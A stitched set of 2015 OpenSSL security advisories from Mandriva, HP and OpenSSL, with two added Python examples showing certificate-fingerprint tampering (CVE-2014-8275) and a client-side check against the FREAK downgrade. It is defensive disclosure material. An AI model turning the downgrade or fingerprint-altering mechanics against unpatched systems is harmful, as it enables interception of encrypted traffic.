a no-ssl3 application with certain error handling. NOTE: this issue
became relevant after the CVE-2014-3568 fix (CVE-2014-3569).
The ssl3_get_key_exchange function in s3_clnt.c in OpenSSL before
0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k allows remote
SSL servers to conduct ECDHE-to-ECDH downgrade attacks and trigger
a loss of forward secrecy by omitting the ServerKeyExchange message
(CVE-2014-3572).
The ssl3_get_key_exchange function in s3_clnt.c in OpenSSL before
0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k allows remote SSL
servers to conduct RSA-to-EXPORT_RSA downgrade attacks and facilitate
brute-force decryption by offering a weak ephemeral RSA key in a
noncompliant role, related to the FREAK issue. NOTE: the scope of
this CVE is only client code based on OpenSSL, not EXPORT_RSA issues
associated with servers or other TLS implementations (CVE-2015-0204).
Use-after-free vulnerability in the d2i_ECPrivateKey function in
crypto/ec/ec_asn1.c in OpenSSL before 0.9.8zf, 1.0.0 before 1.0.0r,
1.0.1 before 1.0.1m, and 1.0.2 before 1.0.2a might allow remote
attackers to cause a denial of service (memory corruption and
application crash) or possibly have unspecified other impact via a
malformed Elliptic Curve (EC) private-key file that is improperly
handled during import (CVE-2015-0209).
The ASN1_item_ex_d2i function in crypto/asn1/tasn_dec.c in OpenSSL
before 0.9.8zf, 1.0.0 before 1.0.0r, 1.0.1 before 1.0.1m, and 1.0.2
before 1.0.2a does not reinitialize CHOICE and ADB data structures,
which might allow attackers to cause a denial of service (invalid
write operation and memory corruption) by leveraging an application
that relies on ASN.1 structure reuse (CVE-2015-0287).
The PKCS#7 implementation in OpenSSL before 0.9.8zf, 1.0.0 before
1.0.0r, 1.0.1 before 1.0.1m, and 1.0.2 before 1.0.2a does not
properly handle a lack of outer ContentInfo, which allows attackers to
cause a denial of service (NULL pointer dereference and application
crash) by leveraging an application that processes arbitrary PKCS#7
data and providing malformed data with ASN.1 encoding, related to
crypto/pkcs7/pk7_doit.c and crypto/pkcs7/pk7_lib.c (CVE-2015-0289).
The updated packages have been upgraded to the 1.0.1m version, where
these security flaws have been fixed.
_______________________________________________________________________
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-5298
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0076
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0195
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0198
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0221
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3470
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3513
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3567
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3569
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3570
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3571
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3572
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8275
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0204
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0205
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0206
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0209
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0286
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0287
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0288
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0289
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0293
http://openssl.org/news/secadv_20150108.txt
http://openssl.org/news/secadv_20150319.txt
_______________________________________________________________________
Updated Packages:
Mandriva Business Server 2/X86_64:
324a85f7e1165ab02881e44dbddaf599 mbs2/x86_64/lib64openssl1.0.0-1.0.1m-1.mbs2.x86_64.rpm
9c0bfb6ebd43cb6d81872abf71b4f85f mbs2/x86_64/lib64openssl-devel-1.0.1m-1.mbs2.x86_64.rpm
58df54e72ca7270210c7d8dd23df402b mbs2/x86_64/lib64openssl-engines1.0.0-1.0.1m-1.mbs2.x86_64.rpm
b5313ffb5baaa65aea05eb05486d309a mbs2/x86_64/lib64openssl-static-devel-1.0.1m-1.mbs2.x86_64.rpm
a9890ce4c33630cb9e00f3b2910dd784 mbs2/x86_64/openssl-1.0.1m-1.mbs2.x86_64.rpm
521297a5fe26e2de0c1222d8d03382d1 mbs2/SRPMS/openssl-1.0.1m-1.mbs2.src.rpm
_______________________________________________________________________
To upgrade automatically use MandrivaUpdate or urpmi. The verification
of md5 checksums and GPG signatures is performed automatically for you.
All packages are signed by Mandriva for security. You can obtain the
GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/en/support/security/advisories/
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
_______________________________________________________________________
Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team
<security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)
iD8DBQFVFTm1mqjQ0CJFipgRAoYFAKCaubn00colzVNnUBFjSElyDptGMQCfaGoS
kz0ex6eI6hA6qSwklA2NoXY=
=GYjX
-----END PGP SIGNATURE-----
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Note: the current version of the following document is available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04604357
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c04604357
Version: 1
HPSBGN03299 rev.1 - HP IceWall SSO Dfw, SSO Certd, MCRP, and Federation Agent
running OpenSSL, Remote Disclosure of Information, Unauthorized Access
NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.
Release Date: 2015-03-19
Last Updated: 2015-03-19
Potential Security Impact: Remote disclosure of information, unauthorized
access
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY
Potential security vulnerabilities have been identified with HP IceWall SSO
Dfw, SSO Certd, MCRP, and Federation Agent running OpenSSL including:
The SSL vulnerability known as "FREAK", which could be exploited remotely to
allow disclosure of information.
Other vulnerabilities which could be exploited remotely resulting in
unauthorized access.
References:
CVE-2014-3570
CVE-2014-3572
CVE-2014-8275
CVE-2015-0204
SSRT101987
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
CVE-2014-3572 and CVE-2015-0204
HP IceWall MCRP Version 2.1 and 3.0
HP IceWall SSO Dfw Version 8.0, 8.0 R1, 8.0 R2, 8.0 R3, and Version 10.0
HP IceWall SSO Certd Version 8.0R3 with DB plugin patch 2 and Version
10.0
HP IceWall Federation Agent Version 3.0
CVE-2014-3570 and CVE-2014-8275
HP IceWall MCRP v2.1, v3.0
HP IceWall SSO Dfw v8.0, v8.0 R1, v8.0 R2, v8.0 R3, and v10.0
HP IceWall SSO Agent v8.0 and v8.0 2007 Update Release 2
BACKGROUND
CVSS 2.0 Base Metrics
===========================================================
Reference Base Vector Base Score
CVE-2014-3570 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0
CVE-2014-3572 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0
CVE-2014-8275 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0
CVE-2015-0204 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0
===========================================================
Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP recommends the following software updates and workaround instructions to
resolve the vulnerabilities for HP IceWall SSO Dfw, SSO Certd, MCRP, and
Federation Agent.
1. IceWall SSO Dfw 10.0 and Certd 10.0, which are running on RHEL, could
be using either the OS bundled OpenSSL library or the OpenSSL bundled with HP
IceWall. If still using the OpenSSL bundled with HP IceWall, please switch to
the OpenSSL library bundled with the OS, and then follow the instructions in
step 3.
Documents are available at the following location with instructions to
switch to the OS bundled OpenSSL library:
http://www.hp.com/jp/icewall_patchaccess
2. For IceWall SSO Dfw and Certd for SSO Dfw 8.0, 8.0 R1, 8.0 R2, 8.0 R3,
and SSO Certd 8.0 R3 with DB plugin patch 2, which bundle OpenSSL, please
download the updated OpenSSL at the following location:
http://www.hp.com/jp/icewall_patchaccess
3. For HP IceWall products running on RHEL that are using the OS bundled
OpenSSL, Red Hat has provided patch or mitigation instructions at the following
location:
https://access.redhat.com/articles/1369543
Note: For RHEL6 (only) and CVE-2014-8275, please apply the RHEL6 patch
for OpenSSL from the following location:
https://access.redhat.com/security/cve/CVE-2014-8275
4. For IceWall products running on HP-UX which are using the OS bundled
OpenSSL, please apply the HP-UX OpenSSL update from the following location:
https://h20392.www2.hp.com/portal/swdepot/displayInstallInfo.do?productNumber=OPENSSL11I
WORKAROUND INSTRUCTIONS
HP recommends the following measures to protect against potential risk
from CVE-2014-3572 and CVE-2015-0204 for the following HP IceWall products.
HP IceWall SSO Dfw and MCRP
- If possible, do not use the SHOST setting which allows IceWall SSO
Dfw or MCRP to use SSL/TLS protocol to back-end web servers.
- If possible, do not use EXPORT-grade ciphers on the back-end web
servers.
HP IceWall SSO Certd (version 10.0 and 8.0R3 applied DB plugin patch
release 2)
- If possible, do not use the LDAPSSL setting which allows IceWall SSO
Certd to connect to the LDAP server using SSL/TLS protocol.
- If possible, do not use EXPORT-grade ciphers on the LDAP server.
IceWall Federation Agent
- If possible, use the "bindings:HTTP-POST" setting instead of
"bindings:HTTP-Artifact" in the service provider meta file. With the
"bindings:HTTP-POST" setting, IWFA does not use SSL to communicate
with the IdP server.
Note: The HP IceWall product is only available in Japan.
HISTORY
Version:1 (rev.1) - 19 March 2014 Initial release
Third Party Security Patches: Third party security patches that are to be
installed on systems running HP software products should be applied in
accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HP Services support channel. For other issues about
the content of this Security Bulletin, send e-mail to security-alert@hp.com.
Report: To report a potential security vulnerability with any HP supported
product, send Email to: security-alert@hp.com
Subscribe: To initiate a subscription to receive future HP Security Bulletin
alerts via Email:
http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins
Security Bulletin Archive: A list of recently released Security Bulletins is
available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Software Product Category: The Software Product Category is represented in
the title by the two characters following HPSB.
3C = 3COM
3P = 3rd Party Software
GN = HP General Software
HF = HP Hardware and Firmware
MP = MPE/iX
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PI = Printing and Imaging
PV = ProCurve
ST = Storage Software
TU = Tru64 UNIX
UX = HP-UX
Copyright 2015 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors
or omissions contained herein. The information provided is provided "as is"
without warranty of any kind. To the extent permitted by law, neither HP or
its affiliates, subcontractors or suppliers will be liable for
incidental,special or consequential damages including downtime cost; lost
profits; damages relating to the procurement of substitute products or
services; or damages for loss of data, or software restoration. The
information in this document is subject to change without notice.
Hewlett-Packard Company and the names of Hewlett-Packard products referenced
herein are trademarks of Hewlett-Packard Company in the United States and
other countries. Other product and company names mentioned herein may be
trademarks of their respective owners.
Softpaq:
http://ftp.hp.com/pub/softpaq/sp70501-71000/sp70649.exe
Easy Update Via ThinPro / EasyUpdate (x86):
http://ftp.hp.com/pub/tcdebian/updates/4.1/service_packs/security-sp-2.0-all-4.1-4.3-x86.xar
http://ftp.hp.com/pub/tcdebian/updates/4.2/service_packs/security-sp-2.0-all-4.1-4.3-x86.xar
http://ftp.hp.com/pub/tcdebian/updates/4.3/service_packs/security-sp-2.0-all-4.1-4.3-x86.xar
http://ftp.hp.com/pub/tcdebian/updates/4.4/service_packs/security-sp-2.1-all-4.4-x86.xar
http://ftp.hp.com/pub/tcdebian/updates/5.0/service_packs/security-sp-2.1-all-5.0-5.1-x86.xar
http://ftp.hp.com/pub/tcdebian/updates/5.1/service_packs/security-sp-2.1-all-5.0-5.1-x86.xar
Via ThinPro / EasyUpdate (ARM):
http://ftp.hp.com/pub/tcdebian/updates/4.1/service_packs/security-sp-2.0-all-4.1-4.3-armel.xar
http://ftp.hp.com/pub/tcdebian/updates/4.2/service_packs/security-sp-2.0-all-4.1-4.3-armel.xar
http://ftp.hp.com/pub/tcdebian/updates/4.3/service_packs/security-sp-2.0-all-4.1-4.3-armel.xar
http://ftp.hp.com/pub/tcdebian/updates/4.4/service_packs/security-sp-2.0-all-4.4-armel.xar
Note: Known issue on security-sp-2.0-all-4.1-4.3-arm.xar: With the patch
applied, VMware cannot connect if security level is set to "Refuse insecure
connections". Updating VMware to the latest package on ftp.hp.com will solve
the problem.
HP SSL for OpenVMS: All versions prior to 1.4-502.
HP SSL 1.4-502 for OpenVMS (based on OpenSSL 0.9.8ze) is available from the
following locations:
- HP SSL for OpenVMS website:
http://h71000.www7.hp.com/openvms/products/ssl/ssl.html
- HP Support Center website:
https://h20566.www2.hp.com/portal/site/hpsc/patch/home
Note: Login using your HP Passport account.
OpenSSL Security Advisory [08 Jan 2015]
=======================================
DTLS segmentation fault in dtls1_get_record (CVE-2014-3571)
===========================================================
Severity: Moderate
A carefully crafted DTLS message can cause a segmentation fault in OpenSSL due
to a NULL pointer dereference. This could lead to a Denial Of Service attack.
This issue affects all current OpenSSL versions: 1.0.1, 1.0.0 and 0.9.8.
OpenSSL 1.0.1 DTLS users should upgrade to 1.0.1k.
OpenSSL 1.0.0 DTLS users should upgrade to 1.0.0p.
OpenSSL 0.9.8 DTLS users should upgrade to 0.9.8zd.
This issue was reported to OpenSSL on 22nd October 2014 by Markus Stenberg of
Cisco Systems, Inc. The fix was developed by Stephen Henson of the OpenSSL
core team.
DTLS memory leak in dtls1_buffer_record (CVE-2015-0206)
=======================================================
Severity: Moderate
A memory leak can occur in the dtls1_buffer_record function under certain
conditions. In particular this could occur if an attacker sent repeated DTLS
records with the same sequence number but for the next epoch. The memory leak
could be exploited by an attacker in a Denial of Service attack through memory
exhaustion.
This issue affects OpenSSL versions: 1.0.1 and 1.0.0.
OpenSSL 1.0.1 DTLS users should upgrade to 1.0.1k.
OpenSSL 1.0.0 DTLS users should upgrade to 1.0.0p.
This issue was reported to OpenSSL on 7th January 2015 by Chris Mueller who also
provided an initial patch. Further analysis was performed by Matt Caswell of the
OpenSSL development team, who also developed the final patch.
no-ssl3 configuration sets method to NULL (CVE-2014-3569)
=========================================================
Severity: Low
When openssl is built with the no-ssl3 option and an SSL v3 ClientHello is
received the ssl method would be set to NULL which could later result in
a NULL pointer dereference.
This issue affects all current OpenSSL versions: 1.0.1, 1.0.0 and 0.9.8.
OpenSSL 1.0.1 users should upgrade to 1.0.1k.
OpenSSL 1.0.0 users should upgrade to 1.0.0p.
OpenSSL 0.9.8 users should upgrade to 0.9.8zd.
This issue was reported to OpenSSL on 17th October 2014 by Frank Schmirler. The
fix was developed by Kurt Roeckx.
ECDHE silently downgrades to ECDH [Client] (CVE-2014-3572)
==========================================================
Severity: Low
An OpenSSL client will accept a handshake using an ephemeral ECDH ciphersuite
using an ECDSA certificate if the server key exchange message is omitted. This
effectively removes forward secrecy from the ciphersuite.
This issue affects all current OpenSSL versions: 1.0.1, 1.0.0 and 0.9.8.
OpenSSL 1.0.1 users should upgrade to 1.0.1k.
OpenSSL 1.0.0 users should upgrade to 1.0.0p.
OpenSSL 0.9.8 users should upgrade to 0.9.8zd.
This issue was reported to OpenSSL on 22nd October 2014 by Karthikeyan
Bhargavan of the PROSECCO team at INRIA. The fix was developed by Stephen
Henson of the OpenSSL core team.
RSA silently downgrades to EXPORT_RSA [Client] (CVE-2015-0204)
==============================================================
Severity: Low
An OpenSSL client will accept the use of an RSA temporary key in a non-export
RSA key exchange ciphersuite. A server could present a weak temporary key
and downgrade the security of the session.
This issue affects all current OpenSSL versions: 1.0.1, 1.0.0 and 0.9.8.
OpenSSL 1.0.1 users should upgrade to 1.0.1k.
OpenSSL 1.0.0 users should upgrade to 1.0.0p.
OpenSSL 0.9.8 users should upgrade to 0.9.8zd.
This issue was reported to OpenSSL on 22nd October 2014 by Karthikeyan
Bhargavan of the PROSECCO team at INRIA. The fix was developed by Stephen
Henson of the OpenSSL core team.
DH client certificates accepted without verification [Server] (CVE-2015-0205)
=============================================================================
Severity: Low
An OpenSSL server will accept a DH certificate for client authentication
without the certificate verify message. This effectively allows a client
to authenticate without the use of a private key. This only affects servers
which trust a client certificate authority which issues certificates
containing DH keys: these are extremely rare and hardly ever encountered.
This issue affects OpenSSL versions: 1.0.1 and 1.0.0.
OpenSSL 1.0.1 users should upgrade to 1.0.1k.
OpenSSL 1.0.0 users should upgrade to 1.0.0p.
This issue was reported to OpenSSL on 22nd October 2014 by Karthikeyan
Bhargavan of the PROSECCO team at INRIA. The fix was developed by Stephen
Henson of the OpenSSL core team.
Certificate fingerprints can be modified (CVE-2014-8275)
========================================================
Severity: Low
OpenSSL accepts several non-DER-variations of certificate signature
algorithm and signature encodings. OpenSSL also does not enforce a
match between the signature algorithm between the signed and unsigned
portions of the certificate. By modifying the contents of the
signature algorithm or the encoding of the signature, it is possible
to change the certificate's fingerprint.
This does not allow an attacker to forge certificates, and does not
affect certificate verification or OpenSSL servers/clients in any
other way. It also does not affect common revocation mechanisms. Only
custom applications that rely on the uniqueness of the fingerprint
(e.g. certificate blacklists) may be affected.
This issue affects all current OpenSSL versions: 1.0.1, 1.0.0 and
0.9.8.
OpenSSL 1.0.1 users should upgrade to 1.0.1k.
OpenSSL 1.0.0 users should upgrade to 1.0.0p.
OpenSSL 0.9.8 users should upgrade to 0.9.8zd.
One variant of this issue was discovered by Antti Karjalainen and
Tuomo Untinen from the Codenomicon CROSS program and reported to
OpenSSL on 1st December 2014 by NCSC-FI Vulnerability
Co-ordination. Another variant was independently reported to OpenSSL
on 12th December 2014 by Konrad Kraszewski from Google. Further
analysis was conducted and fixes were developed by Stephen Henson of
the OpenSSL core team.
Bignum squaring may produce incorrect results (CVE-2014-3570)
=============================================================
Severity: Low
Bignum squaring (BN_sqr) may produce incorrect results on some
platforms, including x86_64. This bug occurs at random with a very
low probability, and is not known to be exploitable in any way, though
its exact impact is difficult to determine. The following has been
determined:
*) The probability of BN_sqr producing an incorrect result at random
is very low: 1/2^64 on the single affected 32-bit platform (MIPS) and
1/2^128 on affected 64-bit platforms.
*) On most platforms, RSA follows a different code path and RSA
operations are not affected at all. For the remaining platforms
(e.g. OpenSSL built without assembly support), pre-existing
countermeasures thwart bug attacks [1].
*) Static ECDH is theoretically affected: it is possible to construct
elliptic curve points that would falsely appear to be on the given
curve. However, there is no known computationally feasible way to
construct such points with low order, and so the security of static
ECDH private keys is believed to be unaffected.
*) Other routines known to be theoretically affected are modular
exponentiation, primality testing, DSA, RSA blinding, JPAKE and
SRP. No exploits are known and straightforward bug attacks fail -
either the attacker cannot control when the bug triggers, or no
private key material is involved.
This issue affects all current OpenSSL versions: 1.0.1, 1.0.0 and 0.9.8.
OpenSSL 1.0.1 users should upgrade to 1.0.1k.
OpenSSL 1.0.0 users should upgrade to 1.0.0p.
OpenSSL 0.9.8 users should upgrade to 0.9.8zd.
This issue was reported to OpenSSL on 2nd November 2014 by Pieter Wuille
(Blockstream) who also suggested an initial fix. Further analysis was
conducted by the OpenSSL development team and Adam Langley of
Google. The final fix was developed by Andy Polyakov of the OpenSSL
core team.
[1] http://css.csail.mit.edu/6.858/2013/readings/rsa-bug-attacks.pdf
Note
====
As per our previous announcements and our Release Strategy
(https://www.openssl.org/about/releasestrat.html), support for OpenSSL versions
1.0.0 and 0.9.8 will cease on 31st December 2015. No security updates for these
releases will be provided after that date. Users of these releases are advised
to upgrade.
References
==========
URL for this Security Advisory:
https://www.openssl.org/news/secadv_20150108.txt
Note: the online version of the advisory may be updated with additional
details over time.
For details of OpenSSL severity classifications please see:
https://www.openssl.org/about/secpolicy.html
References:
CVE-2014-8275 Cryptographic Issues (CWE-310)
CVE-2014-3569 Remote Denial of Service (DoS)
CVE-2014-3570 Cryptographic Issues (CWE-310)
CVE-2014-3571 Remote Denial of Service (DoS)
CVE-2014-3572 Cryptographic Issues (CWE-310)
CVE-2015-0204 Cryptographic Issues (CWE-310)
SSRT101885
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. The
updates are available from either of the following sites:
ftp://sl098ze:Secure12@h2.usa.hp.com
https://h20392.www2.hp.com/portal/swdepot/displayProductInfo.do?productNumber=OPENSSL11I
HP-UX Release        HP-UX OpenSSL depot name
B.11.11 (11i v1)     OpenSSL_A.00.09.08ze.001_HP-UX_B.11.11_32_64.depot
B.11.23 (11i v2)     OpenSSL_A.00.09.08ze.002_HP-UX_B.11.23_IA-PA.depot
B.11.31 (11i v3)     OpenSSL_A.00.09.08ze.003_HP-UX_B.11.31_IA-PA.depot
MANUAL ACTIONS: Yes - Update
Install OpenSSL A.00.09.08ze or subsequent
PRODUCT SPECIFIC INFORMATION
HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application
that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins
issued by HP and lists recommended actions that may apply to a specific HP-UX
system. It can also download patches and create a depot automatically. For
more information see: https://www.hp.com/go/swa
The following text is for use by the HP-UX Software Assistant
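The CVE-2014-8275 entry in the OpenSSL advisory above (and its restatement in the FreeBSD advisory further down) says the risk is confined to applications that key a blacklist on the whole-certificate fingerprint, because the unsigned outer fields (signatureAlgorithm and signatureValue) can be re-encoded without invalidating the certificate. The following Python is an added example, not code from OpenSSL or any of the vendors quoted here: it builds two constructed toy certificate structures with identical signed portions and a differently encoded outer AlgorithmIdentifier, shows that the full-DER fingerprint changes while a fingerprint over the tbsCertificate does not, and implements the RFC 5280 consistency check (outer signatureAlgorithm must equal tbsCertificate.signature) that a hardened blacklist would apply. The DER helpers, the cut-down TBS layout and the sample bytes are all assumptions made for the example; no real certificate is involved.

```python
import hashlib

# --- minimal DER helpers, enough for the constructed structures below ---
SEQ, INT, BITSTR, NULL, OID, CTX0 = 0x30, 0x02, 0x03, 0x05, 0x06, 0xA0


def der_len(n: int) -> bytes:
    """DER length octets (short and long form)."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def tlv(tag: int, content: bytes) -> bytes:
    return bytes([tag]) + der_len(len(content)) + content


def parse_tlv(buf: bytes, pos: int = 0):
    """Return (tag, content, next_pos) for the element at buf[pos:]."""
    tag, first = buf[pos], buf[pos + 1]
    if first < 0x80:
        length, hdr = first, 2
    else:
        nbytes = first & 0x7F
        length = int.from_bytes(buf[pos + 2:pos + 2 + nbytes], "big")
        hdr = 2 + nbytes
    start = pos + hdr
    if start + length > len(buf):
        raise ValueError("truncated DER element")
    return tag, buf[start:start + length], start + length


def children(seq: bytes) -> list:
    """Raw DER of each element directly inside a SEQUENCE."""
    tag, body, _ = parse_tlv(seq)
    if tag != SEQ:
        raise ValueError("expected SEQUENCE")
    out, pos = [], 0
    while pos < len(body):
        _, _, nxt = parse_tlv(body, pos)
        out.append(body[pos:nxt])
        pos = nxt
    return out


# sha256WithRSAEncryption, OID 1.2.840.113549.1.1.11 (content octets)
SHA256_RSA = bytes.fromhex("2a864886f70d01010b")


def alg_id(oid: bytes, null_params: bool) -> bytes:
    """AlgorithmIdentifier ::= SEQUENCE { algorithm OID, parameters OPTIONAL }.
    PKCS#1 identifiers carry an explicit NULL; dropping it is one of the
    non-DER variations the advisory describes."""
    params = tlv(NULL, b"") if null_params else b""
    return tlv(SEQ, tlv(OID, oid) + params)


def build_toy_cert(tbs_alg: bytes, outer_alg: bytes, sig: bytes) -> bytes:
    """Constructed stand-in for Certificate ::= SEQUENCE { tbsCertificate,
    signatureAlgorithm, signatureValue }. The TBS is reduced to
    serialNumber + signature; nothing here is actually signed."""
    tbs = tlv(SEQ, tlv(INT, b"\x01") + tbs_alg)
    return tlv(SEQ, tbs + outer_alg + tlv(BITSTR, b"\x00" + sig))


def tbs_signature_alg(tbs: bytes) -> bytes:
    """The 'signature' field of TBSCertificate (raw DER): it follows the
    serialNumber, which follows the optional [0] EXPLICIT version."""
    elems = children(tbs)
    idx = 1 if elems[0][0] == CTX0 else 0   # skip version if present
    return elems[idx + 1]


def signature_algs_consistent(cert: bytes) -> bool:
    """RFC 5280 4.1.1.2: signatureAlgorithm MUST match tbsCertificate.signature
    byte for byte. A mismatch is the hook that lets the whole-cert
    fingerprint be altered without breaking the signature."""
    tbs, outer_alg, _sig = children(cert)
    return tbs_signature_alg(tbs) == outer_alg


def cert_fingerprint(cert: bytes) -> str:
    """Digest over the full DER, as 'openssl x509 -fingerprint' computes."""
    return hashlib.sha256(cert).hexdigest()


def tbs_fingerprint(cert: bytes) -> str:
    """Digest over the signed portion only: immune to re-encoding of the
    unsigned outer fields, so a blacklist keyed on it survives the trick."""
    tbs, _, _ = children(cert)
    return hashlib.sha256(tbs).hexdigest()


def demo() -> dict:
    sig = b"\xaa" * 8   # constructed placeholder signature bits
    good = build_toy_cert(alg_id(SHA256_RSA, True), alg_id(SHA256_RSA, True), sig)
    # same signed portion, outer AlgorithmIdentifier re-encoded without NULL
    tweaked = build_toy_cert(alg_id(SHA256_RSA, True), alg_id(SHA256_RSA, False), sig)
    return {
        "full_fp_changed": cert_fingerprint(good) != cert_fingerprint(tweaked),
        "tbs_fp_same": tbs_fingerprint(good) == tbs_fingerprint(tweaked),
        "good_consistent": signature_algs_consistent(good),
        "tweaked_consistent": signature_algs_consistent(tweaked),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

Keying a blacklist on the tbsCertificate digest (or on issuer plus serial number) rather than on the whole-certificate fingerprint is the application-side mitigation; the OpenSSL fix in 1.0.1k/1.0.0p/0.9.8zd adds the strict encoding and consistency checks so that the tweaked variant is rejected outright.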
| VAR-201501-0338 | CVE-2015-0204 | OpenSSL s3_clnt.c ssl3_get_key_exchange function RSA-to-EXPORT_RSA downgrade attack vulnerability |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
The ssl3_get_key_exchange function in s3_clnt.c in OpenSSL before 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k allows remote SSL servers to conduct RSA-to-EXPORT_RSA downgrade attacks and facilitate brute-force decryption by offering a weak ephemeral RSA key in a noncompliant role, related to the "FREAK" issue. NOTE: the scope of this CVE is only client code based on OpenSSL, not EXPORT_RSA issues associated with servers or other TLS implementations. OpenSSL is prone to security-bypass vulnerability.
Successfully exploiting these issues may allow attackers to perform unauthorized actions by conducting a man-in-the-middle attack. This may lead to other attacks.
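The entry above describes the client-side bug (a temporary RSA key accepted in a non-export RSA suite) rather than the fix. The Python below is an added example, not OpenSSL's code or the database's: it models the post-1.0.1k client rule that an RSA ServerKeyExchange is only legitimate in an RSA export suite, parses the ServerRSAParams vector encoding from RFC 2246 to check the temporary key size against the 512-bit export limit, and rejects the downgrade case. The cipher suite IDs are the registered TLS values; the modulus and exponent bytes and the handshake states are constructed for the example.

```python
from dataclasses import dataclass
from typing import Optional, Tuple

# Cipher suite IDs from the TLS registry (RFC 2246 / RFC 5246); a subset only.
EXPORT_RSA_SUITES = {
    0x0003: "TLS_RSA_EXPORT_WITH_RC4_40_MD5",
    0x0006: "TLS_RSA_EXPORT_WITH_RC2_CBC_40_MD5",
    0x0008: "TLS_RSA_EXPORT_WITH_DES40_CBC_SHA",
}
RSA_SUITES = {
    0x002F: "TLS_RSA_WITH_AES_128_CBC_SHA",
    0x0035: "TLS_RSA_WITH_AES_256_CBC_SHA",
}
EXPORT_MAX_MODULUS_BITS = 512   # RFC 2246 7.4.3 limit for temporary RSA keys


@dataclass
class ServerRSAParams:
    modulus: bytes
    exponent: bytes

    @property
    def modulus_bits(self) -> int:
        return int.from_bytes(self.modulus, "big").bit_length()


def build_rsa_ske(modulus: bytes, exponent: bytes) -> bytes:
    """ServerKeyExchange body for an RSA temporary key: two opaque<1..2^16-1>
    vectors. The signature that follows them is omitted in this sample."""
    return (len(modulus).to_bytes(2, "big") + modulus
            + len(exponent).to_bytes(2, "big") + exponent)


def parse_rsa_ske(body: bytes) -> ServerRSAParams:
    """Parse ServerRSAParams, rejecting truncated or empty vectors."""
    n_len = int.from_bytes(body[0:2], "big")
    modulus = body[2:2 + n_len]
    p = 2 + n_len
    e_len = int.from_bytes(body[p:p + 2], "big")
    exponent = body[p + 2:p + 2 + e_len]
    if not n_len or not e_len or len(modulus) != n_len or len(exponent) != e_len:
        raise ValueError("malformed ServerRSAParams")
    return ServerRSAParams(modulus, exponent)


def check_rsa_key_exchange(suite: int, ske_body: Optional[bytes]) -> Tuple[bool, str]:
    """Client-side decision after Certificate / (optional) ServerKeyExchange.
    Returns (continue_handshake, reason)."""
    if suite in RSA_SUITES:
        if ske_body is not None:
            # Unpatched clients used this key anyway; that is the downgrade.
            return False, "temporary RSA key offered in non-export suite (FREAK downgrade)"
        return True, "static RSA key exchange, no ServerKeyExchange expected"
    if suite in EXPORT_RSA_SUITES:
        if ske_body is not None and parse_rsa_ske(ske_body).modulus_bits > EXPORT_MAX_MODULUS_BITS:
            return False, "temporary key exceeds export limit"
        # Protocol-conformant, but 512-bit RSA is factorable: export suites
        # should not be enabled at all on either side.
        return True, "export suite negotiated: conformant but weak by design"
    return False, "cipher suite not handled by this check"


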